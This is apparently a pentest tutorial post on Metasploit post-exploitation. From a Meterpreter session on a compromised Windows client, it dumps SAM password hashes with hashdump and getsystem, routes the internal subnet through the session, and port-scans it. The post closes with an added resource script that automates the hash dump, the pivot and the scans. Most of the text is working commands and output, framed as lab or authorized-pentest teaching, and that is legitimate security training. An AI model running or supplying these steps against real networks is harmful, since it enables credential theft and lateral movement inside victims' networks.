The following is based on my experiences and (limited) knowledge. I am not an expert in anything, nor will I likely ever be one. My hope is that this might help someone, somewhere, sometime. If nothing else, it might be a good start for discussion.
Preamble
This exercise is for educational use only and is intended to be used in a lab environment or as part of an authorized pentest. Always ensure that any scans or changes to systems are within your pentest scope and comply with your rules of engagement.
The following series of posts is going to change a little. We will still walk through a fairly contrived example of how Metasploit can be used to exploit a client behind a firewall and, from there, dig further into the network, with the final goal of remote desktop access to a Windows server, but some of the detours I was planning to take won't happen. Vivek from securitytube.net has done an excellent series of video tutorials called the Metasploit Megaprimer and did a much better job of explaining the features of Meterpreter. Please go to securitytube.net and have a look.
Background
When we last left off, we had just launched a Meterpreter session on our internal client.
Process
So now that we have a toehold, let's explore. First things first: grab the password hashes from the client machine. For a detailed explanation of Windows password hashing, see irongeek.com's password exploitation class. Depending on the exploit used and the account it ran under, you may first have to load the priv extension. Note that hashdump reads the SAM, which requires SYSTEM privileges; if it fails with an access-denied error, run getsystem (also part of the priv extension) and try again:
meterpreter > use priv
meterpreter > hashdump
The hashes are displayed on screen, one account per line in pwdump format (user:RID:LM hash:NT hash:::). For now, copy and paste them into a file for later use, and treat that file as sensitive material.
Now let's set up the client so we can use it to scan other devices on the internal network.
First, let's see what the internal network looks like:
meterpreter > route

Network routes
==============

    Subnet           Netmask          Gateway
    ------           -------          -------
    0.0.0.0          0.0.0.0          10.13.37.1
    10.13.37.0       255.255.255.0    10.13.37.149
    10.13.37.149     255.255.255.255  127.0.0.1
    10.255.255.255   255.255.255.255  10.13.37.149
    127.0.0.0        255.0.0.0        127.0.0.1
The client is 10.13.37.149 on the 10.13.37.0/24 network, with 10.13.37.1 as its default gateway, so 10.13.37.0/24 is the subnet we want to reach through it. To use the session from msfconsole, press CTRL-Z and answer y to background the session (the background command does the same thing).
Next, we tell Metasploit to route that subnet through the Meterpreter session. The route command is run from the msf prompt, not inside Meterpreter, and takes the subnet, the netmask and the session ID (here 4; check yours with sessions -l):
msf > route add 10.13.37.0 255.255.255.0 4
msf > route print
route print should now list 10.13.37.0 / 255.255.255.0 with Session 4 as its gateway. If it does not, the session ID was wrong and nothing will be pivoted.
Now let's do a scan. Note that not all scans or exploits will work through this route: it only carries connections that Metasploit modules open through the session, so modules that need raw sockets (SYN scans, ICMP sweeps) and tools running outside msfconsole will not reach the internal network this way. The TCP connect port scanner works fine:
msf > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > show options

Module options:

    Name         Current Setting                Required  Description
    ----         ---------------                --------  -----------
    CONCURRENCY  10                             yes       The number of concurrent ports to check per host
    PORTS        21-25,80,137-139,443-445,3389  yes       Ports to scan (e.g. 22-25,80,110-900)
    RHOSTS       10.13.37.1-254                 yes       The target address range or CIDR identifier
    THREADS      1                              yes       The number of concurrent threads
    TIMEOUT      1000                           yes       The socket connect timeout in milliseconds
    VERBOSE      false                          no        Display verbose output

Note: when doing your initial scan, it is best to limit the ports, since every connection attempt is relayed through the compromised client. Once you have some responses, you can scan more ports on a particular host if necessary.
msf auxiliary(tcp) > exploit
[*] 10.13.37.1:21 - TCP OPEN
[*] 10.13.37.1:80 - TCP OPEN
[*] Scanned 026 of 254 hosts (010% complete)
[*] Scanned 051 of 254 hosts (020% complete)
[*] Scanned 077 of 254 hosts (030% complete)
[*] Scanned 102 of 254 hosts (040% complete)
[*] Scanned 127 of 254 hosts (050% complete)
[*] 10.13.37.130:80 - TCP OPEN
[*] 10.13.37.130:25 - TCP OPEN
[*] 10.13.37.130:139 - TCP OPEN
[*] 10.13.37.130:443 - TCP OPEN
[*] 10.13.37.130:445 - TCP OPEN
[*] 10.13.37.130:3389 - TCP OPEN
[*] Scanned 153 of 254 hosts (060% complete)
[*] Scanned 178 of 254 hosts (070% complete)
[*] Scanned 204 of 254 hosts (080% complete)
[*] Scanned 229 of 254 hosts (090% complete)
[*] 10.13.37.242:22 - TCP OPEN
[*] 10.13.37.242:80 - TCP OPEN
[*] 10.13.37.242:139 - TCP OPEN
[*] 10.13.37.242:445 - TCP OPEN
[*] 10.13.37.244:135 - TCP OPEN
[*] 10.13.37.244:139 - TCP OPEN
[*] 10.13.37.244:445 - TCP OPEN
[*] 10.13.37.245:22 - TCP OPEN
[*] 10.13.37.245:23 - TCP OPEN
[*] 10.13.37.245:21 - TCP OPEN
[*] 10.13.37.245:25 - TCP OPEN
[*] 10.13.37.245:80 - TCP OPEN
[*] 10.13.37.245:139 - TCP OPEN
[*] 10.13.37.245:445 - TCP OPEN
[*] Scanned 254 of 254 hosts (100% complete)
[*] Auxiliary module execution completed
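The whole procedure from this post (dump the hashes, route the internal subnet through the session, sweep it, then widen the scan on one host that answered), collected into a msfconsole resource script. This is an added example, not from the original post. It assumes the Meterpreter session on the internal client is session 4 and the internal subnet is 10.13.37.0/24, as shown in the route output above; the file name pivot-scan.rc and the follow-up target 10.13.37.130 (the host that showed 445 and 3389 open) are my choices. The hash dump uses the post/windows/gather/hashdump module, which is the scriptable equivalent of the Meterpreter hashdump command and has the same SYSTEM-privilege requirement.

```msf
# pivot-scan.rc : added example, not from the original post.
# Assumes the Meterpreter session on the internal client is session 4 and
# that the internal subnet is 10.13.37.0/24 (from the meterpreter route output).
# Load with:  msfconsole -r pivot-scan.rc   or   msf > resource pivot-scan.rc

# Confirm the session number and that it really is a meterpreter session
sessions -l

# Scriptable equivalent of "use priv; hashdump" inside the session.
# Needs SYSTEM on the client; if it fails, getsystem in the session first.
use post/windows/gather/hashdump
set SESSION 4
run

# Route the internal subnet through session 4 (subnet, netmask, session ID)
# and verify: route print must show 10.13.37.0 / 255.255.255.0 with
# "Session 4" as the gateway, otherwise nothing below is pivoted.
route add 10.13.37.0 255.255.255.0 4
route print

# Initial sweep: TCP connect scan (works through the pivot; SYN/ICMP do not).
# Keep the port list short; every probe is relayed through the client.
# THREADS raised from the post's 1 to 10 (assumption: the pivot host copes).
use auxiliary/scanner/portscan/tcp
set RHOSTS 10.13.37.1-254
set PORTS 21-25,80,135,137-139,443-445,3389
set THREADS 10
set TIMEOUT 1000
run

# Follow-up: a host that answered on 445 and 3389 gets a wider scan on its own.
set RHOSTS 10.13.37.130
set PORTS 1-1024
run
```

The script stops nowhere on error, so check the route print output before trusting the scan results: if the route is missing, the portscan silently runs from the attacker's own interface and only the reachable external hosts will show up.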
Next Steps
Selecting the next target, creating a “backdoor”…maybe I will also spend some time making these posts look better too…..